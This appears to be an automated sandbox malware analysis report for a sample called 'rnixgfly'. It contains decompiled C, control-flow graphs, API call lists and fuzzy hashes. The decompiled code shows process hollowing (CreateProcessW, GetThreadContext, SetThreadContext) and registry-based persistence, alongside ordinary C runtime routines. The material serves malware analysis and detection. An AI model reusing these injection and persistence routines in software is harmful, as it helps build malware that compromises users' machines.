                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 004802FF
                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00480324
                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00480336
                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0048033E
                      • CreateFileW.KERNELBASE(?,40000000,00000007,00000000,00000001,00000080,00000000), ref: 00480354
                      • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00480363
                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID: File$Create$AllocChangeCloseExistsFindNotificationPathReadVirtualWrite
                      • String ID:
                      • API String ID: 2600930906-0
                      • Opcode ID: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
                      • Instruction ID: 0e011e1f2ff4ac72c8a7dd6c2a127a897981ff4c6e5640dd9c991066836c4e91
                      • Opcode Fuzzy Hash: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
                      • Instruction Fuzzy Hash: FE418D75A10208BAEB10AFF1EC56FAFB678EF45750F10491BF910F6290E7798A048769
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 129 4808ef-48090a call 48005f 132 48090d-480911 129->132 133 480929-480936 132->133 134 480913-480927 132->134 135 480939-48093d 133->135 134->132 136 48093f-480953 135->136 137 480955-480962 135->137 136->135 138 480965-480969 137->138 139 48096b-48097f 138->139 140 480981-480a5f call 480073 * 8 138->140 139->138 157 480a61-480a6b 140->157 158 480a76 140->158 157->158 159 480a6d-480a74 157->159 160 480a7a-480a96 158->160 159->160 162 480a98-480a9a 160->162 163 480a9f 160->163 164 480e19-480e1c 162->164 165 480aa6-480ace CreateProcessW 163->165 166 480ad0 165->166 167 480ad5-480aee GetThreadContext 165->167 168 480dcd-480dd1 166->168 169 480af0 167->169 170 480af5-480b12 ReadProcessMemory 167->170 171 480dd3-480dd7 168->171 172 480e16-480e18 168->172 169->168 173 480b19-480b22 170->173 174 480b14 170->174 177 480dd9-480de4 171->177 178 480dea-480dee 171->178 172->164 175 480b49-480b68 call 4819fd 173->175 176 480b24-480b33 173->176 174->168 189 480b6a 175->189 190 480b6f-480b90 call 481b17 175->190 176->175 179 480b35-480b3b call 481968 176->179 177->178 181 480df0 178->181 182 480df6-480dfa 178->182 188 480b40-480b42 179->188 181->182 186 480dfc 182->186 187 480e02-480e06 182->187 186->187 191 480e08-480e0d call 481968 187->191 192 480e12-480e14 187->192 188->175 194 480b44 188->194 189->168 197 480b92-480b99 190->197 198 480bd5-480bf5 call 481b17 190->198 191->192 192->164 194->168 200 480b9b-480bc7 call 481b17 197->200 201 480bd0 197->201 204 480bfc-480c11 call 4800da 198->204 205 480bf7 198->205 207 480bc9 200->207 208 480bce 200->208 201->168 211 480c1a-480c24 204->211 205->168 207->168 208->198 212 480c56-480c5a 211->212 213 480c26-480c54 call 4800da 211->213 214 480d3a-480d56 call 4817b6 212->214 215 480c60-480c6e 212->215 213->211 224 480d58 214->224 225 480d5a-480d7b SetThreadContext 214->225 215->214 217 480c74-480c82 215->217 217->214 220 480c88-480ca8 217->220 223 480cab-480caf 220->223 223->214 228 480cb5-480cca 223->228 224->168 226 480d7d 225->226 227 480d7f-480d89 call 4818b7 225->227 226->168 234 480d8b 227->234 235 480d8d-480d91 227->235 230 480cdc-480ce0 228->230 232 480d1d-480d35 230->232 233 480ce2-480cee 230->233 232->223 236 480d1b 233->236 237 480cf0-480d19 233->237 234->168 238 480d99-480d9d 235->238 239 480d93 235->239 236->230 237->236 241 480d9f 238->241 242 480da5-480da9 238->242 239->238 241->242 243 480dab 242->243 244 480db1-480db5 242->244 243->244 245 480dc1-480dc7 244->245 246 480db7-480dbc call 481968 244->246 245->165 245->168 246->245
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID:
                      • String ID: D
                      • API String ID: 0-2746444292
                      • Opcode ID: d91fac697c17d99c2b80a6f6af3eae253fdb44d0b81b9a248de32dcfbf997cf7
                      • Instruction ID: 8a6619345a7d7d36384af75a71153232a61d6a9943a0d3af7c880c0f400125cc
                      • Opcode Fuzzy Hash: d91fac697c17d99c2b80a6f6af3eae253fdb44d0b81b9a248de32dcfbf997cf7
                      • Instruction Fuzzy Hash: 86021570E10208EFEB54EF94CD85BADBBB5BF04304F20445AE515BA2A1D778AE49DF18
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 248 402b6b-402b87 249 402ba3 248->249 250 402b89-402b8d 248->250 252 402ba5-402ba9 249->252 250->249 251 402b8f-402b91 250->251 253 402b93-402b98 call 40370a 251->253 254 402baa-402baf 251->254 266 402b9e call 4036b8 253->266 256 402bb1-402bbb 254->256 257 402bbd-402bc0 254->257 256->257 259 402bde-402bee 256->259 260 402bc2-402bcb call 4031b0 257->260 261 402bce-402bd0 257->261 264 402bf0-402bf6 259->264 265 402bf8 259->265 260->261 261->253 263 402bd2-402bdc 261->263 263->253 263->259 268 402bff-402c01 264->268 265->268 266->249 270 402ce1-402ce4 268->270 271 402c07-402c0e 268->271 270->252 272 402c10-402c15 271->272 273 402c54-402c57 271->273 272->273 276 402c17 272->276 274 402cb5-402cb6 call 404f6e 273->274 275 402c59-402c5d 273->275 283 402cbb-402cbf 274->283 278 402c7e-402c85 275->278 279 402c5f-402c68 275->279 280 402c1d-402c21 276->280 281 402d0f 276->281 286 402c87 278->286 287 402c89-402c8c 278->287 284 402c73-402c78 279->284 285 402c6a-402c71 279->285 288 402c23 280->288 289 402c25-402c28 280->289 282 402d13-402d1c 281->282 282->252 283->282 290 402cc1-402cc5 283->290 291 402c7a-402c7c 284->291 285->291 286->287 292 402ce9-402ced 287->292 293 402c8e-402c9a call 40573d call 405647 287->293 288->289 289->292 294 402c2e-402c4f call 405763 289->294 290->292 295 402cc7-402cd6 290->295 291->287 296 402cff-402d0a call 40370a 292->296 297 402cef-402cfc call 4031b0 292->297 308 402c9f-402ca4 293->308 301 402cd9-402cdb 294->301 295->301 296->266 297->296 301->270 301->271 309 402d21-402d25 308->309 310 402ca6-402ca9 308->310 309->282 310->281 311 402cab-402cb3 310->311 311->301
                      C-Code - Quality: 97%
                      			E00402B6B(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                      				signed int _v8;
                      				char* _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				signed int _t82;
                      				char _t89;
                      				signed int _t96;
                      				signed int _t98;
                      				signed int _t101;
                      				signed int _t104;
                      				signed int _t108;
                      				signed int _t109;
                      				char* _t110;
                      				signed int _t120;
                      				signed int _t123;
                      				signed int _t124;
                      				signed int _t125;
                      				signed int _t126;
                      				void* _t127;
                      
                      				_t110 = _a4;
                      				_t108 = _a8;
                      				_t123 = _a12;
                      				_v12 = _t110;
                      				_v8 = _t108;
                      				if(_t123 == 0 || _a16 == 0) {
                      					L5:
                      					return 0;
                      				} else {
                      					_t131 = _t110;
                      					if(_t110 != 0) {
                      						_t126 = _a20;
                      						__eflags = _t126;
                      						if(_t126 == 0) {
                      							L9:
                      							__eflags = _t108 - 0xffffffff;
                      							if(_t108 != 0xffffffff) {
                      								_t82 = E004031B0(_t110, 0, _t108);
                      								_t127 = _t127 + 0xc;
                      							}
                      							__eflags = _t126;
                      							if(__eflags == 0) {
                      								goto L3;
                      							} else {
                      								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
                      								if(__eflags > 0) {
                      									goto L3;
                      								}
                      								L13:
                      								_t124 = _t123 * _a16;
                      								__eflags =  *(_t126 + 0xc) & 0x0000010c;
                      								_v20 = _t124;
                      								_t109 = _t124;
                      								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                      									_v16 = 0x1000;
                      								} else {
                      									_v16 =  *((intOrPtr*)(_t126 + 0x18));
                      								}
                      								__eflags = _t124;
                      								if(_t124 == 0) {
                      									L40:
                      									return _a16;
                      								} else {
                      									do {
                      										__eflags =  *(_t126 + 0xc) & 0x0000010c;
                      										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                      											L24:
                      											__eflags = _t109 - _v16;
                      											if(_t109 < _v16) {
                      												_t89 = E00404F6E(_t109, _t124, _t126); // executed
                      												__eflags = _t89 - 0xffffffff;
                      												if(_t89 == 0xffffffff) {
                      													L45:
                      													return (_t124 - _t109) / _a12;
                      												}
                      												__eflags = _v8;
                      												if(_v8 == 0) {
                      													L41:
                      													__eflags = _a8 - 0xffffffff;
                      													if(__eflags != 0) {
                      														E004031B0(_a4, 0, _a8);
                      													}
                      													 *((intOrPtr*)(E0040370A(__eflags))) = 0x22;
                      													L4:
                      													E004036B8();
                      													goto L5;
                      												}
                      												_v12 = _v12 + 1;
                      												 *_v12 = _t89;
                      												_t109 = _t109 - 1;
                      												_t65 =  &_v8;
                      												 *_t65 = _v8 - 1;
                      												__eflags =  *_t65;
                      												_v16 =  *((intOrPtr*)(_t126 + 0x18));
                      												goto L39;
                      											}
                      											__eflags = _v16;
                      											if(_v16 == 0) {
                      												_t96 = 0x7fffffff;
                      												__eflags = _t109 - 0x7fffffff;
                      												if(_t109 <= 0x7fffffff) {
                      													_t96 = _t109;
                      												}
                      											} else {
                      												__eflags = _t109 - 0x7fffffff;
                      												if(_t109 <= 0x7fffffff) {
                      													_t50 = _t109 % _v16;
                      													__eflags = _t50;
                      													_t120 = _t50;
                      													_t101 = _t109;
                      												} else {
                      													_t120 = 0x7fffffff % _v16;
                      													_t101 = 0x7fffffff;
                      												}
                      												_t96 = _t101 - _t120;
                      											}
                      											__eflags = _t96 - _v8;
                      											if(_t96 > _v8) {
                      												goto L41;
                      											} else {
                      												_push(_t96);
                      												_push(_v12);
                      												_push(E0040573D(_t126)); // executed
                      												_t98 = E00405647(_t109, _t124, _t126, __eflags); // executed
                      												_t127 = _t127 + 0xc;
                      												__eflags = _t98;
                      												if(_t98 == 0) {
                      													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
                      													goto L45;
                      												}
                      												__eflags = _t98 - 0xffffffff;
                      												if(_t98 == 0xffffffff) {
                      													L44:
                      													_t72 = _t126 + 0xc;
                      													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
                      													__eflags =  *_t72;
                      													goto L45;
                      												}
                      												_v12 = _v12 + _t98;
                      												_t109 = _t109 - _t98;
                      												_v8 = _v8 - _t98;
                      												goto L39;
                      											}
                      										}
                      										_t104 =  *(_t126 + 4);
                      										__eflags = _t104;
                      										if(__eflags == 0) {
                      											goto L24;
                      										}
                      										if(__eflags < 0) {
                      											goto L44;
                      										}
                      										_t125 = _t109;
                      										__eflags = _t109 - _t104;
                      										if(_t109 >= _t104) {
                      											_t125 = _t104;
                      										}
                      										__eflags = _t125 - _v8;
                      										if(_t125 > _v8) {
                      											goto L41;
                      										} else {
                      											E00405763(_v12, _v8,  *_t126, _t125);
                      											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
                      											 *_t126 =  *_t126 + _t125;
                      											_v12 = _v12 + _t125;
                      											_t109 = _t109 - _t125;
                      											_t127 = _t127 + 0x10;
                      											_v8 = _v8 - _t125;
                      											_t124 = _v20;
                      										}
                      										L39:
                      										__eflags = _t109;
                      									} while (_t109 != 0);
                      									goto L40;
                      								}
                      							}
                      						}
                      						_t82 = (_t82 | 0xffffffff) / _t123;
                      						__eflags = _a16 - _t82;
                      						if(_a16 <= _t82) {
                      							goto L13;
                      						}
                      						goto L9;
                      					}
                      					L3:
                      					 *((intOrPtr*)(E0040370A(_t131))) = 0x16;
                      					goto L4;
                      				}
                      			}


























                      0x00402b73
                      0x00402b77
                      0x00402b7c
                      0x00402b7f
                      0x00402b82
                      0x00402b87
                      0x00402ba3
                      0x00000000
                      0x00402b8f
                      0x00402b8f
                      0x00402b91
                      0x00402baa
                      0x00402bad
                      0x00402baf
                      0x00402bbd
                      0x00402bbd
                      0x00402bc0
                      0x00402bc6
                      0x00402bcb
                      0x00402bcb
                      0x00402bce
                      0x00402bd0
                      0x00000000
                      0x00402bd2
                      0x00402bd9
                      0x00402bdc
                      0x00000000
                      0x00000000
                      0x00402bde
                      0x00402bde
                      0x00402be2
                      0x00402be9
                      0x00402bec
                      0x00402bee
                      0x00402bf8
                      0x00402bf0
                      0x00402bf3
                      0x00402bf3
                      0x00402bff
                      0x00402c01
                      0x00402ce1
                      0x00000000
                      0x00402c07
                      0x00402c07
                      0x00402c07
                      0x00402c0e
                      0x00402c54
                      0x00402c54
                      0x00402c57
                      0x00402cb6
                      0x00402cbc
                      0x00402cbf
                      0x00402d13
                      0x00000000
                      0x00402d19
                      0x00402cc1
                      0x00402cc5
                      0x00402ce9
                      0x00402ce9
                      0x00402ced
                      0x00402cf7
                      0x00402cfc
                      0x00402d04
                      0x00402b9e
                      0x00402b9e
                      0x00000000
                      0x00402b9e
                      0x00402cca
                      0x00402ccd
                      0x00402cd2
                      0x00402cd3
                      0x00402cd3
                      0x00402cd3
                      0x00402cd6
                      0x00000000
                      0x00402cd6
                      0x00402c59
                      0x00402c5d
                      0x00402c7e
                      0x00402c83
                      0x00402c85
                      0x00402c87
                      0x00402c87
                      0x00402c5f
                      0x00402c66
                      0x00402c68
                      0x00402c75
                      0x00402c75
                      0x00402c75
                      0x00402c78
                      0x00402c6a
                      0x00402c6c
                      0x00402c6f
                      0x00402c6f
                      0x00402c7a
                      0x00402c7a
                      0x00402c89
                      0x00402c8c
                      0x00000000
                      0x00402c8e
                      0x00402c8e
                      0x00402c8f
                      0x00402c99
                      0x00402c9a
                      0x00402c9f
                      0x00402ca2
                      0x00402ca4
                      0x00402d21
                      0x00000000
                      0x00402d21
                      0x00402ca6
                      0x00402ca9
                      0x00402d0f
                      0x00402d0f
                      0x00402d0f
                      0x00402d0f
                      0x00000000
                      0x00402d0f
                      0x00402cab
                      0x00402cae
                      0x00402cb0
                      0x00000000
                      0x00402cb0
                      0x00402c8c
                      0x00402c10
                      0x00402c13
                      0x00402c15
                      0x00000000
                      0x00000000
                      0x00402c17
                      0x00000000
                      0x00000000
                      0x00402c1d
                      0x00402c1f
                      0x00402c21
                      0x00402c23
                      0x00402c23
                      0x00402c25
                      0x00402c28
                      0x00000000
                      0x00402c2e
                      0x00402c37
                      0x00402c3c
                      0x00402c3f
                      0x00402c41
                      0x00402c44
                      0x00402c46
                      0x00402c49
                      0x00402c4c
                      0x00402c4c
                      0x00402cd9
                      0x00402cd9
                      0x00402cd9
                      0x00000000
                      0x00402c07
                      0x00402c01
                      0x00402bd0
                      0x00402bb6
                      0x00402bb8
                      0x00402bbb
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402bbb
                      0x00402b93
                      0x00402b98
                      0x00000000
                      0x00402b98

                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                      • String ID:
                      • API String ID: 4048096073-0
                      • Opcode ID: 3e55330ef25e11bda9666754cb977c4305d767178d4fee68403ec20e4c83b188
                      • Instruction ID: abacd86320d5ed1a29450df115b8c4d9fa12e2f409c427afaea6b8449eeccf7a
                      • Opcode Fuzzy Hash: 3e55330ef25e11bda9666754cb977c4305d767178d4fee68403ec20e4c83b188
                      • Instruction Fuzzy Hash: AB51F930A00205EBDB249F698A4865FB7B1EF40320F24827BE821772D0D7B9DE41DF59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 352 407055-407064 GetEnvironmentStringsW 353 407066-407069 352->353 354 40706a-40706d 352->354 355 40707f-407087 call 408bfa 354->355 356 40706f-407075 354->356 359 40708c-407091 355->359 356->356 357 407077-40707d 356->357 357->355 357->356 360 4070a0-4070ab call 409de0 359->360 361 407093-40709f FreeEnvironmentStringsW 359->361 360->361
                      C-Code - Quality: 100%
                      			E00407055() {
                      				WCHAR* _t2;
                      				void* _t4;
                      				void* _t15;
                      				WCHAR* _t17;
                      
                      				_t2 = GetEnvironmentStringsW();
                      				_t17 = _t2;
                      				if(_t17 != 0) {
                      					if( *_t17 != 0) {
                      						goto L3;
                      						do {
                      							do {
                      								L3:
                      								_t2 =  &(_t2[1]);
                      							} while ( *_t2 != 0);
                      							_t2 =  &(_t2[1]);
                      						} while ( *_t2 != 0);
                      					}
                      					_t1 = _t2 - _t17 + 2; // -2
                      					_t10 = _t1;
                      					_t4 = E00408BFA(_t1); // executed
                      					_t15 = _t4;
                      					if(_t15 != 0) {
                      						E00409DE0(_t15, _t17, _t10);
                      					}
                      					FreeEnvironmentStringsW(_t17);
                      					return _t15;
                      				} else {
                      					return 0;
                      				}
                      			}







                      0x00407058
                      0x0040705e
                      0x00407064
                      0x0040706d
                      0x00000000
                      0x0040706f
                      0x0040706f
                      0x0040706f
                      0x0040706f
                      0x00407072
                      0x00407077
                      0x0040707a
                      0x0040706f
                      0x00407082
                      0x00407082
                      0x00407087
                      0x0040708c
                      0x00407091
                      0x004070a3
                      0x004070a8
                      0x00407094
                      0x0040709f
                      0x00407066
                      0x00407069
                      0x00407069

                      APIs
                      • GetEnvironmentStringsW.KERNEL32(00000000,00403312), ref: 00407058
                      • __malloc_crt.LIBCMT ref: 00407087
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00407094
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: EnvironmentStrings$Free__malloc_crt
                      • String ID:
                      • API String ID: 237123855-0
                      • Opcode ID: 35615fc54d2ac24f28e300269086089307abffb33a8936016d094c2736e6faa0
                      • Instruction ID: a157651967c13172b9dd03f83ae22e2c4aa92d1ff81e8b70bdfe45de40c08460
                      • Opcode Fuzzy Hash: 35615fc54d2ac24f28e300269086089307abffb33a8936016d094c2736e6faa0
                      • Instruction Fuzzy Hash: BFF02E77D080116ACB317735BC5589B2728CAD5364306813BF406F3382F938AD81C2AA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 364 480422-48077a call 48005f call 480073 * 13 399 48077e-480784 364->399 399->399 400 480786-48079c 399->400 402 4807a2-4807b0 400->402 403 4808e4 400->403 402->403 406 4807b6-4807d8 402->406 404 4808e6-4808ec 403->404 406->403 409 4807de-4807f5 406->409 409->403 411 4807fb-480811 409->411 413 480823-480831 call 48037c 411->413 414 480813-48081e 411->414 413->403 418 480837-48084c call 48020a 413->418 414->404 418->403 421 480852-480858 418->421 422 48085e-480879 RegGetValueW 421->422 422->403 423 48087b-480895 RegOpenKeyExW 422->423 423->422 424 480897-4808d7 RegSetValueExW 423->424 424->403 428 4808d9-4808e2 424->428 428->404
                      APIs
                        • Part of subcall function 0048037C: PathFileExistsW.KERNELBASE(?), ref: 00480406
                        • Part of subcall function 0048037C: CreateDirectoryW.KERNELBASE(?,00000000), ref: 00480412
                        • Part of subcall function 0048020A: PathFileExistsW.KERNELBASE(?), ref: 004802E1
                        • Part of subcall function 0048020A: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 004802FF
                      • RegGetValueW.KERNELBASE(80000001,?,?,0000FFFF,00000000,00000000,00000000), ref: 00480875
                      • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00020006,?), ref: 00480891
                      • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,?,00000103), ref: 004808CF
                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID: File$CreateExistsPathValue$DirectoryOpen
                      • String ID:
                      • API String ID: 3065547873-0
                      • Opcode ID: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
                      • Instruction ID: 498ffd471fdff6c3de7371ec1af5bb4f55fd9987042214dd8db9f43c787b6c7f
                      • Opcode Fuzzy Hash: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
                      • Instruction Fuzzy Hash: E1D14F21E64358A9EB20DBF0DC41FEEB778EF14750F10549BE608EB190E7B54A84CB69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 430 48037c-48040b call 48005f call 480073 * 3 PathFileExistsW 440 48041a-48041f 430->440 441 48040d-480418 CreateDirectoryW 430->441 441->440
                      APIs
                      • PathFileExistsW.KERNELBASE(?), ref: 00480406
                      • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00480412
                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID: CreateDirectoryExistsFilePath
                      • String ID:
                      • API String ID: 2624722123-0
                      • Opcode ID: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
                      • Instruction ID: f7226abc605649c109aacaafde02357ce878df971b12a456388b0a4ab7084ea5
                      • Opcode Fuzzy Hash: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
                      • Instruction Fuzzy Hash: 0611E725A64308B4EB10ABF0EC12FBE6335DF40B10F10991BF904EB2A0E6764A448399
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 442 402d27-402d3b call 405990 445 402d6c 442->445 446 402d3d-402d40 442->446 448 402d6e-402d73 call 4059d5 445->448 446->445 447 402d42-402d45 446->447 449 402d74-402d8f call 4058af call 402b6b 447->449 450 402d47-402d4b 447->450 462 402d94-402da9 call 402dab 449->462 453 402d5c-402d67 call 40370a call 4036b8 450->453 454 402d4d-402d59 call 4031b0 450->454 453->445 454->453 462->448
                      C-Code - Quality: 88%
                      			E00402D27(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _t19;
                      				intOrPtr _t22;
                      				void* _t33;
                      
                      				_push(0xc);
                      				_push(0x411fd0);
                      				E00405990(__ebx, __edi, __esi);
                      				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
                      				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
                      					L6:
                      					_t19 = 0;
                      				} else {
                      					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
                      						E004058AF( *((intOrPtr*)(_t33 + 0x18)));
                      						 *((intOrPtr*)(_t33 - 4)) = 0;
                      						_t22 = E00402B6B( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
                      						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
                      						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
                      						E00402DAB();
                      						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
                      					} else {
                      						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
                      						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
                      							E004031B0( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
                      						}
                      						 *((intOrPtr*)(E0040370A(_t41))) = 0x16;
                      						E004036B8();
                      						goto L6;
                      					}
                      				}
                      				return E004059D5(_t19);
                      			}






                      0x00402d27
                      0x00402d29
                      0x00402d2e
                      0x00402d35
                      0x00402d3b
                      0x00402d6c
                      0x00402d6c
                      0x00402d42
                      0x00402d45
                      0x00402d77
                      0x00402d7d
                      0x00402d8f
                      0x00402d97
                      0x00402d9a
                      0x00402da1
                      0x00402da6
                      0x00402d47
                      0x00402d47
                      0x00402d4b
                      0x00402d54
                      0x00402d59
                      0x00402d61
                      0x00402d67
                      0x00000000
                      0x00402d67
                      0x00402d45
                      0x00402d73

                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: __lock_file_memset
                      • String ID:
                      • API String ID: 26237723-0
                      • Opcode ID: 33fae8696a22ddc01b4e9403b0cd89f9325ebf0e069a85eabe1f3f523a260358
                      • Instruction ID: 9e23bb097c87b2cb0c8b28cae3504dfd9644aeb73d234b4e03d6ed55913451c2
                      • Opcode Fuzzy Hash: 33fae8696a22ddc01b4e9403b0cd89f9325ebf0e069a85eabe1f3f523a260358
                      • Instruction Fuzzy Hash: 92014071800219EBCF22AFA5C90989F7F30AF04765F10813BF914761E1C3798A62DF95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 86%
                      			E00402F66(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                      				signed int _t15;
                      				signed int _t17;
                      				void* _t26;
                      				intOrPtr _t28;
                      
                      				_push(0xc);
                      				_push(0x411ff0);
                      				E00405990(__ebx, __edi, __esi);
                      				_t28 =  *((intOrPtr*)(_t26 + 8));
                      				_t29 = _t28 != 0;
                      				if(_t28 != 0) {
                      					E004058AF( *((intOrPtr*)(_t26 + 8)));
                      					_t5 = _t26 - 4;
                      					 *_t5 =  *(_t26 - 4) & 0x00000000;
                      					__eflags =  *_t5;
                      					_t15 = E00402DD2( *((intOrPtr*)(_t26 + 8))); // executed
                      					 *(_t26 - 0x1c) = _t15;
                      					 *(_t26 - 4) = 0xfffffffe;
                      					E00402FC1();
                      					_t17 =  *(_t26 - 0x1c);
                      				} else {
                      					 *((intOrPtr*)(E0040370A(_t29))) = 0x16;
                      					_t17 = E004036B8() | 0xffffffff;
                      				}
                      				return E004059D5(_t17);
                      			}







                      0x00402f66
                      0x00402f68
                      0x00402f6d
                      0x00402f74
                      0x00402f7a
                      0x00402f7c
                      0x00402f96
                      0x00402f9c
                      0x00402f9c
                      0x00402f9c
                      0x00402fa3
                      0x00402fa9
                      0x00402fac
                      0x00402fb3
                      0x00402fb8
                      0x00402f7e
                      0x00402f83
                      0x00402f8e
                      0x00402f8e
                      0x00402fc0

                      APIs
                      • __lock_file.LIBCMT ref: 00402F96
                      • __ftell_nolock.LIBCMT ref: 00402FA3
                        • Part of subcall function 0040370A: __getptd_noexit.LIBCMT ref: 0040370A
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                      • String ID:
                      • API String ID: 2999321469-0
                      • Opcode ID: 8f3263e8028bc76e635bdae56e131ecbfbf27d60d2d8a770a885cf73d947d5b9
                      • Instruction ID: 8b2200138f54d187428e708a17617e132bb05bf2f3e2a31370f94ea22eeb7263
                      • Opcode Fuzzy Hash: 8f3263e8028bc76e635bdae56e131ecbfbf27d60d2d8a770a885cf73d947d5b9
                      • Instruction Fuzzy Hash: 51F03771410606EADB117F75C90675E7B70AF00379F20857BF414BA1D1CBBC45919A19
                      Uniqueness

                      Uniqueness Score: -1.00%

